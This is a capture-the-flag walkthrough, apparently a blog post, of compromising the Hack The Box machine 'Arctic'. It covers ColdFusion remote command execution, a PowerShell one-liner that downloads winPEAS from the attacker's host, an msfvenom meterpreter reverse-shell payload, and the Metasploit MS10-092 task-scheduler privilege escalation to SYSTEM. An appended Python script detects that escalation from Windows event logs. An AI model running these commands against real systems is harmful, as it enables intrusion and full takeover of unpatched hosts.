Disclaimer

The host penetrated in this article was accessed with legal authorization. The tools and methods used here are for learning and exchange only; please do not use the tools and penetration approaches in this article for any illegal purpose. I accept no responsibility for any consequences arising from that, nor for any misuse or damage caused.

Service discovery

┌──(rootkali)-[~/htb/Arctic]
└─# nmap -Pn -sV 10.10.10.11 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-14 10:26 EST
Nmap scan report for 10.10.10.11
Host is up (0.26s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Not even a web service; that threw me for a moment..
Port 8500 is not very common. I tried opening it in the browser: it is very slow, but it exposes a directory traversal (file listing) vulnerability

Index of /

CFIDE/               dir   03/22/17 08:52
cfdocs/              dir   03/22/17 08:55

The path below is the login page of a CMS

http://10.10.10.11:8500/CFIDE/administrator/

The CMS name in the page title: ColdFusion

I searched Google for a few exploits for this CMS and found this Remote Command Execution one

Download it locally and change the local IP and port

Run the attack:

Printing some information for debugging...
lhost: 10.10.14.6
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: 7ed641ce03ea4eaa92aca6d9ef4c60ab.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.11] 49510
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

Got the initial shell..

Privilege escalation

Upload winPEAS to the target

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:8000/winPEAS.bat','c:\Users\tolis\Desktop\winPEAS.bat')"

According to the winPEAS enumeration, the target is missing quite a few patches, which can probably be exploited for privilege escalation

"Microsoft Windows Server 2008 R2 Standard "
[i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)
MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys)
MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri)
MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo)
MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys)
MS05-055 patch is NOT installed 2K/SP4-APC Data-Free)
MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS)
MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager)
MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
MS04-020 patch is NOT installed 2K/SP4-POSIX)
MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
MS14-070 patch is NOT installed 2K3/SP2-TCP/IP)
MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei)
MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu)

Generate a meterpreter shell and upload it to the target, so that we can use the missing-patch exploit modules to escalate:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4455 -f exe > shell64.exe

After getting the reverse session, select the exploit module for the MS10-092 patch

msf6 > search MS10-092

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/local/ms10_092_schelevator  2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege Escalation


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_092_schelevator

Set the options

msf6 exploit(windows/local/ms10_092_schelevator) > options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION   2                yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4466             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista, 7, and 2008

Launch the attack

msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.6:4466 
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\bHVjZOnFoCage.exe
[*] Creating task: wHs9mNJi8EUp2
[*] SUCCESS: The scheduled task "wHs9mNJi8EUp2" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\wHs9mNJi8EUp2...
[*] Original CRC32: 0xc87307c
[*] Final CRC32: 0xc87307c
[*] Writing our modified content back...
[*] Validating task: wHs9mNJi8EUp2
[*] 
[*] Folder: \
[*] TaskName                                 Next Run Time          Status         
[*] ======================================== ====================== ===============
[*] wHs9mNJi8EUp2                            1/1/2022 6:04:00 ��    Ready          
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "wHs9mNJi8EUp2" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "wHs9mNJi8EUp2" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (200262 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "wHs9mNJi8EUp2".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 3 opened (10.10.14.6:4466 -> 10.10.10.11:49789) at 2021-12-15 03:06:45 -0500
[*] SUCCESS: The scheduled task "wHs9mNJi8EUp2" was successfully deleted.
[*] SCHELEVATOR

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Successfully escalated to NT AUTHORITY\SYSTEM
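The defender's view of the run above, as an added example that is not part of the original post: the schelevator module creates a task, rewrites its XML, disables and re-enables it, runs it and deletes it within seconds, and each of those steps lands in the Windows Security log as event 4698 (task created), 4701 (disabled), 4700 (enabled) and 4699 (deleted). The Python below flags that lifecycle; the log lines are constructed samples, and the 60-second lifetime threshold is an assumption.

```python
# Added example: detect a create -> disable/enable -> delete scheduled-task
# burst like the MS10-092 schelevator run. Event IDs 4698/4699/4700/4701 are
# the real Security-log IDs; the log text below is a constructed sample.
from collections import defaultdict
from datetime import datetime

# Constructed sample log, one event per line: "timestamp,event_id,subject,task_name".
SAMPLE_LOG = """\
2022-01-01 06:03:50,4698,ARCTIC\\tolis,\\wHs9mNJi8EUp2
2022-01-01 06:03:51,4701,ARCTIC\\tolis,\\wHs9mNJi8EUp2
2022-01-01 06:03:52,4700,ARCTIC\\tolis,\\wHs9mNJi8EUp2
2022-01-01 06:03:55,4699,ARCTIC\\tolis,\\wHs9mNJi8EUp2
2022-01-01 09:00:00,4698,ARCTIC\\Administrator,\\Microsoft\\Windows\\Backup\\Nightly
"""

SHORT_LIVED_SECONDS = 60  # assumption: no legitimate task is created and deleted within a minute


def parse_events(text):
    """Turn the CSV-style sample into (timestamp, event_id, subject, task) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, subject, task = line.split(",", 3)
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(eid), subject, task))
    return events


def find_schelevator_patterns(events, window=SHORT_LIVED_SECONDS):
    """Return one finding per task that was created and deleted inside `window`
    seconds, or that was disabled and re-enabled in between (the XML-rewrite tell)."""
    by_task = defaultdict(list)
    for ev in events:
        by_task[ev[3]].append(ev)
    findings = []
    for task, evs in by_task.items():
        evs.sort()  # chronological; tuples sort by timestamp first
        ids = [e[1] for e in evs]
        created = [e for e in evs if e[1] == 4698]
        deleted = [e for e in evs if e[1] == 4699]
        if not created or not deleted:
            continue  # a task that still exists is not this pattern
        lifetime = (deleted[-1][0] - created[0][0]).total_seconds()
        toggled = 4701 in ids and 4700 in ids  # disable then enable after writing the XML back
        if lifetime <= window or toggled:
            findings.append({"task": task, "subject": created[0][2],
                             "lifetime_s": lifetime, "toggled": toggled})
    return findings


if __name__ == "__main__":
    for f in find_schelevator_patterns(parse_events(SAMPLE_LOG)):
        print(f)
```

These event IDs are only written when the "Audit Other Object Access Events" subcategory is enabled, so check the audit policy before relying on this rule.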